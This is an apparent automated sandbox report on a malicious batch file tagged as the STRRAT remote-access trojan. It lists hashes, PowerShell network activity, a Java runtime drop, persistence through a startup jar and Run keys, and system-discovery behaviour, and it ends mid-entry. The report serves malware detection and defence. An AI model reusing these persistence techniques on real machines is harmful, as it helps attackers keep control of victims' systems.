Analysis
-
max time kernel
149s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
02-01-2025 13:57
Static task
static1
Behavioral task
behavioral1
Sample
esigned-document_eml.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
esigned-document_eml.bat
Resource
win10v2004-20241007-en
General
-
Target
esigned-document_eml.bat
-
Size
2KB
-
MD5
a0d37228b4ad0ebea6537b99cbcb7ff0
-
SHA1
cec0438ed7acde6a177bc220df2d4fa94352e539
-
SHA256
e85d8640a62e0d223fe9892384eecb8bb9e67d4bf2fc020881058506b33bec30
-
SHA512
a4fda2b2adbe591bbfb44fb0949becf75349f5255f197008727486f15e0cc18fcdbce6c1d3ba16e65a5e32a5d8ffc857cfa75402975eafedf4c11524d4f1f9ea
Malware Config
Signatures
-
Strrat family
-
Blocklisted process makes network request 3 IoCs
flow pid Process 19 1016 powershell.exe 21 1016 powershell.exe 67 2864 powershell.exe -
pid Process 1016 powershell.exe 2864 powershell.exe 4180 powershell.exe 2864 powershell.exe 1576 powershell.exe -
Downloads MZ/PE file
-
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tre2.jar java.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 16 IoCs
pid Process 5036 JavaSetup8u421.exe 4944 JavaSetup8u421.exe 4316 LZMA_EXE 452 LZMA_EXE 5900 installer.exe 5192 javaw.exe 5256 ssvagent.exe 5268 javaws.exe 2180 jp2launcher.exe 5676 javaws.exe 5692 jp2launcher.exe 5972 javaw.exe 5088 java.exe 5000 java.exe 3564 java.exe 5324 java.exe -
Loads dropped DLL 64 IoCs
pid Process 2440 MsiExec.exe 2440 MsiExec.exe 2440 MsiExec.exe 2440 MsiExec.exe 2440 MsiExec.exe 2440 MsiExec.exe 2440 MsiExec.exe 2440 MsiExec.exe 2440 MsiExec.exe 2440 MsiExec.exe 2440 MsiExec.exe 2440 MsiExec.exe 2440 MsiExec.exe 5192 javaw.exe 5192 javaw.exe 5192 javaw.exe 5192 javaw.exe 5192 javaw.exe 5192 javaw.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5900 installer.exe 5256 ssvagent.exe 5256 ssvagent.exe 2180 jp2launcher.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\SunJavaUpdateSched = "C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jusched.exe" JavaSetup8u421.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tre2 = "\"C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\AppData\\Roaming\\tre2.jar\"" java.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tre2 = "\"C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\AppData\\Roaming\\tre2.jar\"" java.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\U: msiexec.exe -
Installs/modifies Browser Helper Object 2 TTPs 4 IoCs
BHOs are DLL modules which act as plugins for Internet Explorer.
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} installer.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\NoExplorer = "1" installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9} installer.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}\NoExplorer = "1" installer.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 86 ip-api.com -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\WindowsAccessBridge-32.dll installer.exe File created C:\Windows\SysWOW64\WindowsAccessBridge-64.dll installer.exe File created C:\Windows\SysWOW64\WindowsAccessBridge-32.dll installer.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Java\jre1.8.0_421\legal\jdk\jcup.md msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\client\jvm.dll msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\lib\fonts\LucidaBrightRegular.ttf msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\legal\javafx\libxslt.md msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\legal\jdk\ecc.md msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\prism_d3d.dll msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\lib\deploy\ffjcext.zip msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\legal\jdk\cryptix.md msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\lib\jfxswt.jar msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\dtplugin\deployJava1.dll msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\legal\jdk\unicode.md msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\decora_sse.dll msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\jsoundds.dll msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\lib\rt.jar msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\java.exe msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\lib\security\java.policy msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\lib\ext\jfxrt.jar msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\keytool.exe msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\sunec.dll msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\api-ms-win-core-file-l1-2-0.dll msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\api-ms-win-core-libraryloader-l1-1-0.dll msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\orbd.exe msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\api-ms-win-core-console-l1-2-0.dll msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\lib\deploy\messages_zh_CN.properties msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\ssvagent.exe msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\api-ms-win-crt-stdio-l1-1-0.dll msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\api-ms-win-core-interlocked-l1-1-0.dll msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\net.dll msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\lib\ext\zipfs.jar msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\legal\jdk\lcms.md msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\lib\fontconfig.bfc msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\lib\images\cursors\win32_MoveNoDrop32x32.gif msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\verify.dll msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\j2gss.dll msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\legal\jdk\santuario.md msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\api-ms-win-core-file-l2-1-0.dll msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\ssv.dll msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\lib\images\cursors\win32_CopyNoDrop32x32.gif msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\legal\javafx\webkit.md msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\legal\jdk\thaidict.md msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\java-rmi.exe msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\lib\fonts\LucidaSansRegular.ttf msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\lib\fontconfig.properties.src msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\glib-lite.dll msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\glass.dll msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\java_crw_demo.dll msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\lib\cmm\CIEXYZ.pf msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\awt.dll msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\nio.dll msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\lib\fonts\LucidaBrightItalic.ttf msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\legal\jdk\relaxngdatatype.md msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\legal\jdk\relaxngcc.md msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\prism_common.dll msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\mlib_image.dll msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\API-MS-Win-core-xstate-l2-1-0.dll msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\lib\jfr\profile.jfc msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\legal\jdk\dom.md msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\lib\tzdb.dat msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\api-ms-win-core-localization-l1-2-0.dll msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\lib\cmm\GRAY.pf msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\msvcp140_2.dll msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\client\classes.jsa javaw.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\lib\logging.properties msiexec.exe File created C:\Program Files (x86)\Java\jre1.8.0_421\bin\api-ms-win-crt-convert-l1-1-0.dll msiexec.exe -
Drops file in Windows directory 36 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSIBFD7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC233.tmp msiexec.exe File created C:\Windows\Installer\e57bd2a.msi msiexec.exe File created C:\Windows\Installer\SourceHash{4A03706F-666A-4037-7777-5F2748764D10} msiexec.exe File opened for modification C:\Windows\Installer\e57bd2f.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI169.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI206.tmp msiexec.exe File opened for modification C:\Windows\Sun\Java\Deployment\deployment.properties javaw.exe File opened for modification C:\Windows\Installer\MSIC512.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFD7B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFE18.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFEA6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIBFF8.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC06C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFB94.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFC03.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC029.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIFF04.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIBECC.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIBFD8.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{77924AE4-039E-4CA4-87B4-2F32180421F0} msiexec.exe File created C:\Windows\Installer\e57bd2f.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIC019.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC03A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC06B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSICC.tmp msiexec.exe File created C:\Windows\Installer\e57bd26.msi msiexec.exe File opened for modification C:\Windows\Installer\e57bd26.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIBF78.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIC04B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC148.tmp msiexec.exe File created C:\Windows\Installer\e57bd33.msi msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 31 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jp2launcher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language java.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JavaSetup8u421.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language java.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language javaws.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language javaw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ssvagent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language javaw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jp2launcher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language java.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JavaSetup8u421.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language javaws.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language java.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language LZMA_EXE -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msiexec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msiexec.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 2680 timeout.exe 5056 timeout.exe 5792 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8FE2181-CAE7-49EE-9B04-DB7EB4DA544A}\Policy = "3" installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA}\AlternateCLSID = "{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}" installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{44D1B085-E495-4b5f-9EE6-34795C46E7E7}\AppPath = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin" installer.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{44D1B085-E495-4b5f-9EE6-34795C46E7E7}\Policy = "3" installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA} installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5852F5ED-8BF4-11D4-A245-0080C6F74284}\AppPath = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin" installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8FE2181-CAE7-49EE-9B04-DB7EB4DA544A}\AppName = "ssvagent.exe" installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{44D1B085-E495-4b5f-9EE6-34795C46E7E7}\AppName = "jp2launcher.exe" installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9167671E-7E42-49E1-97FC-4F4712EB4CEE}\AppPath = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin" installer.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9167671E-7E42-49E1-97FC-4F4712EB4CEE}\Policy = "3" installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8FE2181-CAE7-49EE-9B04-DB7EB4DA544A} installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{44D1B085-E495-4b5f-9EE6-34795C46E7E7} installer.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA}\Compatibility Flags = "1024" installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5852F5ED-8BF4-11D4-A245-0080C6F74284} installer.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5852F5ED-8BF4-11D4-A245-0080C6F74284}\Policy = "0" installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9167671E-7E42-49E1-97FC-4F4712EB4CEE} installer.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\ACTIVEX COMPATIBILITY\{CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA} installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5852F5ED-8BF4-11D4-A245-0080C6F74284}\AppName = "javaws.exe" installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9167671E-7E42-49E1-97FC-4F4712EB4CEE}\AppName = "jp2launcher.exe" installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8FE2181-CAE7-49EE-9B04-DB7EB4DA544A}\AppPath = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin" installer.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0017-0000-0179-ABCDEFFEDCBA} installer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0017-0000-0031-ABCDEFFEDCBC}\ = "Java Plug-in 1.7.0_31" installer.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0018-0000-0383-ABCDEFFEDCBB} installer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0015-0000-0014-ABCDEFFEDCBA} installer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0015-0000-0058-ABCDEFFEDCBC}\InprocServer32\ = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin\\jp2iexp.dll" installer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0017-0000-0199-ABCDEFFEDCBA}\InprocServer32 installer.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0017-0000-0426-ABCDEFFEDCBB} installer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0015-0000-0054-ABCDEFFEDCBB}\InprocServer32\ = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin\\jp2iexp.dll" installer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0017-0000-0152-ABCDEFFEDCBB}\InprocServer32 installer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0017-0000-0393-ABCDEFFEDCBB}\InprocServer32\ = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin\\jp2iexp.dll" installer.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0018-0000-0323-ABCDEFFEDCBA} installer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0016-0000-0118-ABCDEFFEDCBC}\ = "Java Plug-in 1.6.0_118" installer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0016-0000-0117-ABCDEFFEDCBA}\InprocServer32\ = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin\\jp2iexp.dll" installer.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0016-0000-0046-ABCDEFFEDCBB} installer.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\CLSID\{CAFEEFAC-0018-0000-0235-ABCDEFFEDCBC}\INPROCSERVER32 installer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0014-0002-0063-ABCDEFFEDCBA}\InprocServer32\ThreadingModel = "Apartment" installer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0015-0000-0006-ABCDEFFEDCBA}\InprocServer32 installer.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBA} installer.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0013-0001-0021-ABCDEFFEDCBB} installer.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0018-0000-0008-ABCDEFFEDCBC} installer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0018-0000-0073-ABCDEFFEDCBA} installer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0018-0000-0209-ABCDEFFEDCBB}\InprocServer32\ = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin\\jp2iexp.dll" installer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0013-0001-0067-ABCDEFFEDCBB} installer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0015-0000-0028-ABCDEFFEDCBB}\InprocServer32\ = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin\\jp2iexp.dll" installer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0017-0000-0284-ABCDEFFEDCBB}\InprocServer32 installer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0017-0000-0289-ABCDEFFEDCBA}\InprocServer32 installer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0018-0000-0263-ABCDEFFEDCBA}\ = "Java Plug-in 1.8.0_263" installer.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\CLSID\{CAFEEFAC-0014-0002-0038-ABCDEFFEDCBA}\INPROCSERVER32 installer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0017-0000-0210-ABCDEFFEDCBB}\InprocServer32\ThreadingModel = "Apartment" installer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0015-0000-0076-ABCDEFFEDCBB} installer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0016-0000-0176-ABCDEFFEDCBA} installer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0014-0001-0004-ABCDEFFEDCBB}\InprocServer32\ = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin\\jp2iexp.dll" installer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0017-0000-0161-ABCDEFFEDCBA}\ = "Java Plug-in 1.7.0_161" installer.exe Set value (str) 